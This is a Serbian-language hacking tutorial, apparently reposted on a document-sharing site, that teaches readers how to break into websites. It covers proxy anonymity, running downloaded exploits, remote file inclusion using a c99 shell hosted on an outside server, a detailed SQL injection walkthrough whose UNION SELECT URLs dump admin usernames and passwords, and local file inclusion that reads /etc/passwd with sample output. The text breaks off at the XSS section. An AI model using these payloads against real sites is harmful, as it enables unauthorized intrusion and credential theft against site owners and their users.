Website Hacking

April 20, 2019 | Author: Nyth00n | Category: N/A
Share Embed Donate


Short Description

Download Website Hacking...

Description

############################### Tema : Web Hacking Autor : Nyth00n ############################### -Sadrzaj[x0] Objasnjenje [x1] Sta je potrebno [x2] Anonimnost [x3] Shell account [x4] Nalazenje informacija o sajtu [x5] Iskoristiti rupu [x6] Remote File Inclusion [x7] SQL Injection [x8] Local File Inclusion [x9] XSS Cross site scripting [x10] Hyper terminal buffer overflow [x11] PHPix 1.0x directory [x12] Ping of death [x13] Krekovanje sifre putem Ftp [x14] Ftp hacking [x15] SQL String [x16] Remote file upload [x17] Front page bug ########################################## * x0 Objasnjenje * Ono sto me je nateralo da napisem ovaj tutorial koji je naravno u edukativne svr he je to sto me stvarno ljudi smaraju sa time brale daj mi hakni ovaj sajt ajd ovo ajd ono.Ako neko zloupotrebi ovaj tutorial ne snosim nikakvu odgovornost. * x1 Sta je potrebno * Za ovaj tutorial i za hakovanje sajta najbolje je imati unix,zatim ti je porebno imati par wingate adresa i shell account.Wingate adressa vam je isto sto i proxy mozete i proxy koristiti ako vam je lakse trebace vam jedan port scanner ako vam je port 21 otvoren znaci da sajt ima ftp sto ce nam olaksati radnju. * x2 Anonimnost * Anonimnost je nesto prvo sto nam treba pasti na pamet kada je rec o hakovanju sa jta portrebno nam je imati jednu veliku listu proxy-a idi na google i potrazite je d orko inurl:proxy.txt zatim skinite proxy switcher koji ja koristim najlaksi je za rukovanje cak na nj emu imate i funkciju da vam on sam skine listu proxy-a skrenirajte pronadjite alive i konektujte se z a njega.A za wingate adresu koja izgleda na primer 123.123.123.123 i koja je na portu 1080 uradicete sledece idite u start pa run i ukucajte telnet zatim upisite "o" bez navodnika zatim remote system posle u hostname ukuc ajte wingate 123.123.123.123

a u drugo polje upisite port 1080 zatim se konektujte sacekajte malo posle se te lnetujte na svoj shell account sto ce biti nekisajt.com 23 umesto porta za telnet (23) mozete i koristiti file transfer pro tocol (21) ako vam je account na ftp. * x3 Shell account * Unix je visekorisnicki sistem sto znaci da moze vise korisnika da ga koristi pos toje servisi koji besplatno koriste daju racune za svoj sisitem kao www.luxadmin.org Imacete racun sa smanjenim privileg ija negde oko 50MB idite na luxadmin.org uzmite jedan shell account dobicete username i password posle se telnetujte na t aj shell account pricao sam o tome sada se ulogujte * x4 Nalazenje informacija o sajtu * Nalazenje informacija o sajtu je nesto sto vam najvise treba kod upada na neki s ajt evo nekih najvaznijih stvari koje trebate da oktrijete. Operativni sistem; Otvorene portove; Ip adressu; Nalazenje operativnog sistema je mnogo laka stvar moze da se uradi preko telneta na port 23 pisace vam koji operativni sistem koriste a mozete i otici na www.netcraft.com i ukucati zeljeni sajt i vi deti koji os koriste i jos poneke informacije postoji milion nacina ja za ovakve stvari koristim nmap ali ne bitno skroz. Za skeniranje otvorenih portova mozete skinuti sa neta neki port scanner ili net tools ukucajte ip adressu od sajta i skenirace sve portove odakle dokle mu vi odredite da skenira. Ip adresu mozete lako pronaci idi na strart zatim run i ukucajte cmd u command p romptu ukucajte tracert ime-sajta.com i u zagradi ce vam pisati ip adressa na primer [123.123.123.123] * x5 iskoristiti rupu * Postoje exploiti koji iskoriscavaju i nalaze rupu sa exploitima mozemo dobiri ro ot na serveru (root je user koji ima sve privilegije na sajtu) exploiti su vecinom pisani u c-u ili u perl-u pronadjite ga na netu ubacite u va s shell account i kompajlujte ga ako je exploit pisan u c-u treba uraditi ovo : gcc file.c imate kompajliran exploit mozete ga pokrenuti sa file ili ./file e sa da kada ga pokrenete ako vam bude pisalo usage upisite ./file www.sajt.com 23 sacekajte konekciju i usli st e. Ako je exploit pisan u perlu morate skinuti active perl zatim exploit premestiti u c:\perl\bin i sacuvati ga na primer exploit.pl ovo .pl je veoma vazno zatim idi na start - run - cmd i ukucajte cd c:\perl\bin zatim exploit.pl i usli ste. * x6 * Remote file inclusion ( RFI ) Za remote file inclusion nam je potrebno da imamo :

-php shell (c99,c100,r57) -pretrazivac (google dork) Primer lose php koda u sajtu izgleda ovako : Ako smo odlucili haknuti na primer sajt koji izgleda ovako www.sajt.com moramo p ronaci link koji izgleda na primer ovako : www.sajt.com/index.php?page=download e sada potreban nam je shell na sajtu na primer ako ste uploadovali shell na nek om free hostu t35.com onda vam sajt izlgeda www.vas-host.t35.com/c99.txt fajl mora biti u txt formatu e sada posle index.php ?page= moramo ubaciti link od naseg shella na primer www.sajt.com/index.php?page=http://www.vas-host.t35.com/c99.txt??? na kraju se stavlja nekoliko upitnika to je veoma bitno kada se shell includira na sajtu evo sta se desava sa vuln sajtom : * x7 * SQL Injection Iako postoji milion tutoriala na ovu temu (moju omiljenu), ovo ce biti milion i prvi onda :). Nakon mnogih pitanja o SQL Injection kako, sta i zbog cega odlucil o sam da ovo napisem i nadam se da vise nece biti nikakvih pitanja. 1.0 - Pronalazenje ranjive web stranice Ako nematate odredjenu stranicu koju ste vec izabrali da zelite hackovati, onda ukucajte u google neki dork, npr.: (inurl:"product_details.php?product_id=") Naci cete hrpu stranica pa sad odaberite neke i pogledajte da li su ranjivi. Kako odrediti jesu li ranjivi ili ne ? Pa jednostavno, samo na kraj URL-a dodajt e ' pa bi to izgledalo ovako: (http://site.com/product_details.php?product_id=1') Ako je stranica ranjiva pojavit' ce se SQL error i mozemo poceti injection. U su protnom, ako stranica nije ranjiva onda vam se nece prikazati nikakav error, bic e isto kao i prije te mozete ici traziti drugi web :). 2.0 - Pronalazenje broja kolona, ORDER BY komanda -

Da saznamo broj kolona od stranice moramo da koristimo ORDER BY komandu, pa bi t o npr. izgledalo ovako: http://site.com/product_details.php?product_id=-1 ORDER BY 1-Pojavi se normalno stranica bez ikakvih gresaka ? Onda je okay, ima najmanje 1, idemo dalje da vidimo koliko max. ima... http://site.com/product_details.php?product_id=-1 ORDER BY 10-Probavam odmah da li ima 10 kolona, ako ne pojavit' ce se greska "different numb er of columns" te cemo probati manje, 9,8 i tako... http://site.com/product_deatils.php?product_id=-1 ORDER BY 9-Na broju 9 nema nikakav error a na 10 ima. To znaci da web ima 9 kolona. Nadam s e da ste skontali ovaj dio jer idemo dalje... 2.1 - UNION funkcija Kada smo nasli da ima 9 kolona, sada idemo dalje te kucate ovo: http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,2,3,4,5,6,7 ,8,9-Sada cete vjerovatno vidjeti neke brojeve npr. 1 ili 2 ili 3 itd.. U ovom primje ru, meni je pokazan broj 2. Super, sve dalje radi normalno zato cemo da provjerimo verziju Mysql verziju ova ko: http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,version(),3 ,4,5,6,7,8,9-za verziju isto mozemo raditi i ovako na primer http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,@@version,3 ,4,5,6,7,8,9-3.0 - Ako je Mysql verzija 4 Onda cete morati pogadjati ime kolone i tabele. Pa npr. table_name bi mogao da b ude: user users admin admins login itd. 3.2 A ime kolona: username user_name user admin

password pwd pass user_password itd. Pokusavajte svakakve nacine. Prvo pogledajte ime tabele koja postoji pa onda dal je kolone. Jednom cete valjda ubosti :). Npr. ovako: http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,concat(user name,0x3a,password),3,4,5,6,7,8,9 FROM admin-http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,concat(user name,0x3a,password),3,4,5,6,7,8,9 FROM users-3.3 A ako stvarno ne nadjete, onda pokusajte sa mysql.user (default) http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,concat(user ,0x3a,password),3,4,5,6,7,8,9 FROM mysql.user-4.0 - Ako je Mysql verzija 5 Sada je lakse jer postoji information_schema. Sigurno se pitate sta je sad to, n o polako, malo strpljenja, vjezbe i sve se skonta :) information_schema ce nam odmah izbaciti sve tabele i kolone, a to postignemo ov ako: http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,table_name, 3,4,5,6,7,8,9 FROM information_schema.tables-Sad mozda imate listu SVIH tabela, a ako ne, pogledajte pod 4.3. 4.1 Da dobijete listu kolona, kucate http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,column_name ,3,4,5,6,7,8,9 FROM information_schema.columns-Ako je sva lista tu onda okay, a ako ne, opet pogledajte pod 4.3 4.2 Dobijanje liste bazi koje postoje na site-u bi izgledalo ovako: http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,schema_name ,3,4,5,6,7,8,9 FROM information_schema.schemata--

A opet, ako niste dobili citavu listu nego samo 1 (information_schema obicno) on da predjite na sljedecu stavku opet - 4.3. 4.3 Sta uraditi ako niste dobili citavu listu postojecih tabela/kolona? Onda idete preko funkcije LIMIT, najbolje za to da koristite jedan mali program

jer bi vam ovako trebalo jako puno vremena, a i zivaca (lako je naci, ako ne nad jete, posaljite mi PP). A komanda bi izgledala ovako:

http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,concat(tabl e_name),3,4,5,6,7,8,9 FROM information_schema.tables LIMIT 0,1-pa dalje: http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,concat(tabl e_name),3,4,5,6,7,8,9 FROM information_schema.tables LIMIT 1,1-http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,concat(tabl e_name),3,4,5,6,7,8,9 FROM information_schema.tables LIMIT 2,1-http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,concat(tabl e_name),3,4,5,6,7,8,9 FROM information_schema.tables LIMIT 3,1--

I tako dalje redate brojeve sve dok ne nadjete ime tabele koja vama treba a koju niste mogli pogoditi (admin, users itd.) ;) Isto tako radite za column_name i schema_name ili sta vec hocete, bitno je da st e skontali tu LIMIT funkciju. 5.0 Imate ime tabele, kolone i baze. Sta sad ? Pa samo iskoristite te podatke i uradite injection do kraja, na primjer: http://site.com/product_details.php?product_id=-1 UNION ALL SELECT 1,concat(user name,0x3,password),3,4,5,6,7,8,9 FROM baza.admin I sada vam pise login ime i password. Password je moguce da je enkriptovan u md5 hash tako da cete ga morati crackovati. To mozete preko bruteforce tool-a, ili dictionary attack. Pogledajte malo program PasswordsPro. 5.1 Pronalazak login stranice obicno na domenu dodajete: /admin /login /adminlogin itd. To sami morate skontati, nema nikakvog programa za to, nazalost. Pa bi to mozda izgledalo ovako: http://site.com/admin/login.php Ako vec nadjete admin login page samo ukucajte vec pronadjeni username ili email i password ja se nadam da ste skontali ovo i da nece vise imati nikakavih probl ema,ovaj tut sam odlucio raditi na facebook-u da bih pojedincima pojasnio neke s tvari koje ne mogu na chatu... Pozdrav [==Nyth00n==] * x8 * Local File Inclusion Local file inclusion je jedna veoma prostrana metoda hakovanja sajta u kojoj hak er dolazi do fajla u kojem se nalaze passwordi od klijenata websajta /etc/passwd ili etc/group

ako sajt izgleda na primer www.sajt.rs/index.php?cmd=klijenti izbrisemo klijenti i dodamo nesto bezveze na primer as456gf4 ako dobijemo function error onda je sajt vuln na lfi evo prim er loseg koda u sajtu : haker pronalazi link u sajtu koji izgleda na primer ovako www.sajt.rs/index.php? cmd=klijenti e sada korisimo se sledecim znacima ../../../../../ i biramo odredj en direktorij etc/passwd sve izgleda ovako ../../../../../../../etc/passwd ako ne dobijemo nikakav fajl onda dodajte %00 zn ak za vracanje u nullbyt zatim cemo dobiti fajl koji izgleda ovako : root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:da emon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/s pool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/ sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool /mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uuc p:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:game s:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x :14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbu s:x:81:81:System message bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/no login distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual console m emory owner:/dev:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc: x:32:32:Portmapper RPC user:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/n ologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webali zer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squ id:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin mailnull:x:47:47::/va r/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp: x:38:38::/etc/ntp:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpm :x:37:37::/var/lib/rpm:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologi n xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon us er:/home/sabayon:/sbin/nologin cpanel:x:32001:32001::/usr/local/cpanel:/bin/fals e zatim trebamo dekodirati password o tome cu pricati malo kasnije. * x9 * XSS Cross site scripting XSS je metoda u kojoj hakeri najcesce dolaze do informacija kao sto su na primer cookies evo primer ranjivog koda na sajtu :
View more...

Comments

Copyright ©2017 KUPDF Inc.
SUPPORT KUPDF